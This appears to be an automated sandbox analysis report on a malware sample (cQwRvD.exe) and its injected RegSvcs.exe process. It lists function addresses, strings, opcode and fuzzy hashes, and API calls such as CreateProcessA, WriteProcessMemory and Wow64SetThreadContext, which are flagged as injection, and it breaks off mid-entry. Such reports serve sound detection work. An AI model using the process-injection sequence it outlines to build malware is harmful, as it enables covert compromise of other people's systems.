Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9e271312f24bdcb617f4bfcc80be50de6e0ab4f50c80e4f0067a77dbdecb65
Instruction ID: fd8d892b3ca3ade68b05edc5b65150b30129e9df33d794daedf369b83b19d566
Opcode Fuzzy Hash: 7e9e271312f24bdcb617f4bfcc80be50de6e0ab4f50c80e4f0067a77dbdecb65
Instruction Fuzzy Hash: DB90023120240242954072585808A8E410597F1302B95D426A0015555CCA2489655321

Function 01462C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: e92e6181618958a10a58889b768929d238eb8c5b276a41f028c9df8da4f78d73
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01462890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0146293C
___swprintf_l.LIBCMT ref: 0146295E
___swprintf_l.LIBCMT ref: 014629A3
___swprintf_l.LIBCMT ref: 0149A52E

Strings

:%u.%u.%u.%u, xrefs: 0149A5B8
::%hs%u.%u.%u.%u, xrefs: 0149A527
ffff:, xrefs: 0149A504
::ffff:0:%u.%u.%u.%u, xrefs: 0149A54E

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 20cdd772f2ec0a9f3e1b961e164b267f392f339a2cf229f44ee0665facadf5b8
Instruction ID: b8006cddcf04347b0d2a17a02805051ad7e2b369b2637d3c591a99c7fb3d4af1
Opcode Fuzzy Hash: 20cdd772f2ec0a9f3e1b961e164b267f392f339a2cf229f44ee0665facadf5b8
Instruction Fuzzy Hash: 0751F3B2B00116BFCB11DF9D8880D7EFBB8BB59244714C22BE469D3651D374DE048BA1

Function 014D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 014D24A6
___swprintf_l.LIBCMT ref: 014D24E2
___swprintf_l.LIBCMT ref: 014D257D
___swprintf_l.LIBCMT ref: 014D25A3
___swprintf_l.LIBCMT ref: 014D25C8
___swprintf_l.LIBCMT ref: 014D2608

Strings

::%hs%u.%u.%u.%u, xrefs: 014D249E
:%u.%u.%u.%u, xrefs: 014D25FF
ffff:, xrefs: 014D247D, 014D249D
::ffff:0:%u.%u.%u.%u, xrefs: 014D24DA

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: cd0e0e72dc5003a193763dbcf3ed6dfddf816994f74c9de675f865fab7a79ccd
Instruction ID: 9f5621ee5ce9ad780a775780d2ce2fbc7cb4f3eb66ad80478f1fda8c2b7b7cc9
Opcode Fuzzy Hash: cd0e0e72dc5003a193763dbcf3ed6dfddf816994f74c9de675f865fab7a79ccd
Instruction Fuzzy Hash: 6D511571A00646AFCF30DF9DC9A0D7FBBF8EB44204B54846FE896D3651E6B4EA008760

Function 01457630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 01494713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01494655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01494742
CLIENT(ntdll): Processing section info %ws..., xrefs: 01494787
ExecuteOptions, xrefs: 014946A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014946FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01494725

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 458e1fbe02e6346d4d1377ea602778df2d4be8816e3068266eda712b9adf81dc
Instruction ID: ad862b95476a79597cd59283b52feabcdb34cad104b4705bda3ac57ed64bc6cb
Opcode Fuzzy Hash: 458e1fbe02e6346d4d1377ea602778df2d4be8816e3068266eda712b9adf81dc
Instruction Fuzzy Hash: E95160316002097ADF119B95EC85FAE7BACAF24315F5400BFD909A72B1D770DE468F61

Function 0146B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0146B6BF

Strings

-, xrefs: 0146B650
0, xrefs: 0146B695
0, xrefs: 0146B66F
+, xrefs: 0146B65A

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 4b2cc6140c5775eef3be87593ccc589b279aba2cebb399959635c9f03f7b5fb4
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 3B81C070F0524A8EEF258E6CC8517FEBBA9EF55328F18411BD955E73A1C73888418B63

Function 0144F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0149031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014902E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014902BD

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 4f7f43d2fd14debc3cbfa663e3598425c939c8c540142ac82bc0973b8ea94af8
Instruction ID: 82770a62b65fc0f2654f5e6cbf50b80acbe02471511c1a78e3ace046eee606f1
Opcode Fuzzy Hash: 4f7f43d2fd14debc3cbfa663e3598425c939c8c540142ac82bc0973b8ea94af8
Instruction Fuzzy Hash: 86E18B706047429FEB25CF2CC884B2ABBE4AB94314F140A5EF5A58B3F1D775D94ACB42

Function 0145BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01497B7F
RTL: Re-Waiting, xrefs: 01497BAC
RTL: Resource at %p, xrefs: 01497B8E

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 5121ad276460454366262617096d81c69e000ebdd96ef3c928c5204a1c24d548
Instruction ID: edb61785349b45b18308091a3b433f6f66dee57a9200fbf13a09f5e64d699d43
Opcode Fuzzy Hash: 5121ad276460454366262617096d81c69e000ebdd96ef3c928c5204a1c24d548
Instruction Fuzzy Hash: CB41E4327007029FDB21CE29C850B6BB7E6EF98725F100A1EEA56D77A1D771E405CB91

Function 0145B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0149728C

Strings

RTL: Re-Waiting, xrefs: 014972C1
RTL: Resource at %p, xrefs: 014972A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01497294

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 84e5fce5f572011186dcd55e33d26953b5b1729a96b230fb6e831cad8339abf3
Instruction ID: 94107e2cb21baea99dc55c79cdd568d767a056325145833b163275f22a372813
Opcode Fuzzy Hash: 84e5fce5f572011186dcd55e33d26953b5b1729a96b230fb6e831cad8339abf3
Instruction Fuzzy Hash: FF411431610206ABCB21CF25CC41B6ABBA5FF65715F10062EFD559B361DB31E8068BD1

Function 014D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 014D238D
___swprintf_l.LIBCMT ref: 014D23B3

Strings

%%%u, xrefs: 014D2384
]:%u, xrefs: 014D23AA

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: f7e5ad4be51c24a2ce99f24ed741379a867a0a729582cac3a07b64312a32bb0d
Instruction ID: 8a3d47bf071881e0cc57fab18189bf4036fb35a156eab6671be3235bbfc47864
Opcode Fuzzy Hash: f7e5ad4be51c24a2ce99f24ed741379a867a0a729582cac3a07b64312a32bb0d
Instruction Fuzzy Hash: 4F317F72A002299FDB60DF39CC50FEFB7F8AB54610F54055BE949E3210EF70AA448BA0

Function 01467D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01467E8B

Strings

-, xrefs: 01467DDD
+, xrefs: 01467DE8

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 37bd394eea8d88816a25c54c08051276187826e2c53e13ea3d3ec9271bb9d17d
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 6791D370E002069BEB28CF6DC890ABFBBA9EF5472EF14451BE955E73E0D73489418712

Function 01429126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01429191
@, xrefs: 01429175

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 9bb98da2bc9bc25e18f3757afe47c089ece8a59f8cc3465ec7f78b9887038825
Instruction ID: 2e8e88c5259bba616b4415033769b9e5ce8397c1ecab7ef3ef95763b0505ed94
Opcode Fuzzy Hash: 9bb98da2bc9bc25e18f3757afe47c089ece8a59f8cc3465ec7f78b9887038825
Instruction Fuzzy Hash: E0812871D002799BDB319B54CC44BEEBAB8AF48714F0441EBEA19B7250D7709E85CFA0

Analysis Process: cQwRvD.exePID: 8128, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	309
Total number of Limit Nodes:	29

Executed Functions

Function 08F87330 Relevance: 8.5, Strings: 6, Instructions: 1022
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJq, xrefs: 08F874D5
<ov!, xrefs: 08F8772C
Teq, xrefs: 08F87B84
pq, xrefs: 08F87FF9
xbq, xrefs: 08F87460
4'q, xrefs: 08F87F21

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID: 4'q$<ov!$TJq$Teq$pq$xbq
API String ID: 0-613785864
Opcode ID: 77b9b249942087fd7bded1461fa5239932276ec2872a3a2af7df1980c78c7702
Instruction ID: 1def6024fd9a67f9873ad60e67a8a493e9f77505f54d9ca1884f9e34d4f07e21
Opcode Fuzzy Hash: 77b9b249942087fd7bded1461fa5239932276ec2872a3a2af7df1980c78c7702
Instruction Fuzzy Hash: 7BB2CF75E00628CFDB64DF69C984BD9BBB2BF89304F1581E9D509AB225DB319E81CF40

Function 08F8AFE1 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1597766966.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8f80000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998912a0e771ab4cda93fd488587537c348a5f59bd3c975b0dc59bba9320842
Instruction ID: 7279d1d73bd8cd0ab987a68d9cde61a5babacb0b3c4888abed71a804e871ba5c
Opcode Fuzzy Hash: 0998912a0e771ab4cda93fd488587537c348a5f59bd3c975b0dc59bba9320842
Instruction Fuzzy Hash: CF4117B5E04218CBDB08DFAAD9416AEFBF6EF88301F14C02AD819A7354EB305942CF40

Function 07607A8C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992053681751950c0404a53b1985d54d56380128adbb83a9de23e3adec22239a
Instruction ID: 517041f0829351c673799f218f7e872a6e4dd508c44a5dbf1e34dc341eb4bac4
Opcode Fuzzy Hash: 992053681751950c0404a53b1985d54d56380128adbb83a9de23e3adec22239a
Instruction Fuzzy Hash: 54A002C4CEE401C0840D5C2041041B7C07C120B081D103924001B330D3C400D81744CD

Function 0186D0B1 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0186D13E
GetCurrentThread.KERNEL32 ref: 0186D17B
GetCurrentProcess.KERNEL32 ref: 0186D1B8
GetCurrentThreadId.KERNEL32 ref: 0186D211

Memory Dump Source

Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 08cd4e387e6f32c5a620a68d3e4bfde4bfefac575ce482e8ff13cdead757033c
Instruction ID: c58b265f0e0af0444ba763a9266ee53626950bcfae1039ffc00fcc20714b0cb1
Opcode Fuzzy Hash: 08cd4e387e6f32c5a620a68d3e4bfde4bfefac575ce482e8ff13cdead757033c
Instruction Fuzzy Hash: 4A5166B0A007098FEB14DFAAD448BAEFBF1EF48314F208059E418A7350DB745945CB66

Function 0186D0C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0186D13E
GetCurrentThread.KERNEL32 ref: 0186D17B
GetCurrentProcess.KERNEL32 ref: 0186D1B8
GetCurrentThreadId.KERNEL32 ref: 0186D211

Memory Dump Source

Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ff8728ea6148efc43ae5d8e21c3c6bbbedafcb06f47c79b928217d351efdf490
Instruction ID: b9eeda3ae4dd0d564ab1019e7ccba054e40b7559738727e73291541b327d1c14
Opcode Fuzzy Hash: ff8728ea6148efc43ae5d8e21c3c6bbbedafcb06f47c79b928217d351efdf490
Instruction Fuzzy Hash: 275165B09007098FEB14DFAAD449B9EFBF1EB88310F208059E418A7350DB746945CB66

Function 0760521C Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0760545E

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3262d4e59cc241fc46959e4dfdad4fc6a76866a8a1c3ff7ff9ae91e70b16807e
Instruction ID: b6510d79063d5f00d083ae770dbb409e4e842de3cb408a68b6ea7691d968a175
Opcode Fuzzy Hash: 3262d4e59cc241fc46959e4dfdad4fc6a76866a8a1c3ff7ff9ae91e70b16807e
Instruction Fuzzy Hash: 37A14FB1D0071ACFDB28DF68C841BDEBBB2BF44310F148569E80AA7281D7759995CF91

Function 07605228 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0760545E

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4997181b0eca62fe256c15ee5b749f2f52c662c46e5da8561a93001b9b21d628
Instruction ID: 95df8f09c9c11729231e615fb388ebec9de21ffcd0bd2089f8185f70da52f7fa
Opcode Fuzzy Hash: 4997181b0eca62fe256c15ee5b749f2f52c662c46e5da8561a93001b9b21d628
Instruction Fuzzy Hash: 39914EB1D0071A8FDB28DF68C841B9EBBB2BF44310F148569E80AA7281DB759995CF91

Function 0186AE28 Relevance: 1.7, APIs: 1, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0186B07E

Memory Dump Source

Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: df3e80d5f77c5d7223bf57ef5b809a39b1f6cb19d0dc2216a23da2c4e7318b63
Instruction ID: ad0983c227334a8dc9877e9917301dcc2d06f745ff6f2846d561f4e5de1c5351
Opcode Fuzzy Hash: df3e80d5f77c5d7223bf57ef5b809a39b1f6cb19d0dc2216a23da2c4e7318b63
Instruction Fuzzy Hash: F1816870A00B058FD728DF2AD44475ABBF9FF88304F00892DD19AE7A51D735EA46CB91

Function 0186590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018659C9

Memory Dump Source

Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fa01064d6701bee096f4f16c4132047a2c43931f8166d79be034e9b02e0ae14a
Instruction ID: f889af56faf5d573db0c0963437275221a9264a783e404a0d9555739ad3c634d
Opcode Fuzzy Hash: fa01064d6701bee096f4f16c4132047a2c43931f8166d79be034e9b02e0ae14a
Instruction Fuzzy Hash: CC41E2B1D0071DCBEB24DFAAC884B8DBBF5BF49314F20816AD508AB251DB756A46CF50

Function 018644B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 018659C9

Memory Dump Source

Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f1b2c80752a2764798430959fc029e7aea79ba17d45b9c9fd2aca18b9495f236
Instruction ID: 5d8864c7f6d6d96afe72bdb1af495c161e1fb39cbcdcd0f13cf1d49d3a4b51ff
Opcode Fuzzy Hash: f1b2c80752a2764798430959fc029e7aea79ba17d45b9c9fd2aca18b9495f236
Instruction Fuzzy Hash: FC41E2B1D0071DCBDB28DFA9C884B8DBBF5BF49314F20816AD408AB251DB756A46CF90

Function 0761EF00 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1596831225.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7610000_cQwRvD.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 72e4ff47739bdc80271aa11f9059c07076dc1997b11fe7da214ca3f952a9fcef
Instruction ID: 9a6ed69079cef1ff8d7faae1eef08420b65640e2072adc6faa6a572b776c2670
Opcode Fuzzy Hash: 72e4ff47739bdc80271aa11f9059c07076dc1997b11fe7da214ca3f952a9fcef
Instruction Fuzzy Hash: 1D317A769043899FCB12CFA9C804A9EBFF4EF09311F18845AE954A7261C336D855CFA1

Function 0761C264 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0761D885,?,?), ref: 0761D937

Memory Dump Source

Source File: 0000000B.00000002.1596831225.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7610000_cQwRvD.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 80030cade4820f558c703161176211ca1ddd859c5413841ea7aa18421b37d768
Instruction ID: 73919f6863a216965c95a96c03bb87f283d37de6263d71d3837eefa07d7ad4a8
Opcode Fuzzy Hash: 80030cade4820f558c703161176211ca1ddd859c5413841ea7aa18421b37d768
Instruction Fuzzy Hash: 2131E4B5D0034A9FDB10DF9AD884A9EBBF4EB48310F54842AE919A7310D775A941CFA0

Function 07604F99 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605030

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 076f6e7553ba708b42c6d73b8887809a72c55e626acc7ffa2eec20198048b1a6
Instruction ID: 04daa434c049d776581dc21f90d67a2da5cdd041b8d9ed0f3046486a3f9cb5ff
Opcode Fuzzy Hash: 076f6e7553ba708b42c6d73b8887809a72c55e626acc7ffa2eec20198048b1a6
Instruction Fuzzy Hash: 912155B5D003099FCB24CFA9C885BDEBBF1BF48310F10842AE919A7240D7799940CFA0

Function 07604FA0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605030

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 058492bb49e7c2d85af9153e0dbd27c41615460edfc2fefea2429ead198973c3
Instruction ID: c9aaba3e7fd7294a49f0a907dbd00c337a1bb20a17c761cb56405accb7bd1208
Opcode Fuzzy Hash: 058492bb49e7c2d85af9153e0dbd27c41615460edfc2fefea2429ead198973c3
Instruction Fuzzy Hash: 002124B19003499FDB24CFA9C881BDEBBF5BF48310F50842AE919A7240D7799940CBA0

Function 0761D898 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0761D885,?,?), ref: 0761D937

Memory Dump Source

Source File: 0000000B.00000002.1596831225.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7610000_cQwRvD.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: adf235c3a31405678551fefbcdf8955815e261531bee3b16b4d041bbb26745ae
Instruction ID: 2fa697f639bfecffa6cade50b0631c30dba155f941c59c442add7e883c85a831
Opcode Fuzzy Hash: adf235c3a31405678551fefbcdf8955815e261531bee3b16b4d041bbb26745ae
Instruction Fuzzy Hash: AB21C3B5D013499FDB10CFAAD984ADEBBF5BB48320F14842AE919A7310C7759945CFA0

Function 07604E00 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07604E86

Memory Dump Source

Source File: 0000000B.00000002.1596791122.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7600000_cQwRvD.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a5d14a27740e0b4192fd53e1ec30a3b7186627e1f4acf4798e25c5b725ac2343
Instruction ID: b89e61e4bf9b80c869f0c4900d4543787fbc62616c77eea9bc1c7bdb61b5819d
Opcode Fuzzy Hash: a5d14a27740e0b4192fd53e1ec30a3b7186627e1f4acf4798e25c5b725ac2343
Instruction Fuzzy Hash: 782178B1D003498FDB24DFA9C4857EEBBF4EB49310F54842ED959A7280CB789945CFA0

Function 0186D709 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D797

Memory Dump Source

Source File: 0000000B.00000002.1591008174.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1860000_cQwRvD.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a9133fa50155c664ae3481082171c811cc62bd78ccb7c78c9c72c5d80825f6d2
Instruction ID: 87a040e1a1154a1547bb58d48e43031c0fbe6d5d159bc92389c00018fa30c115
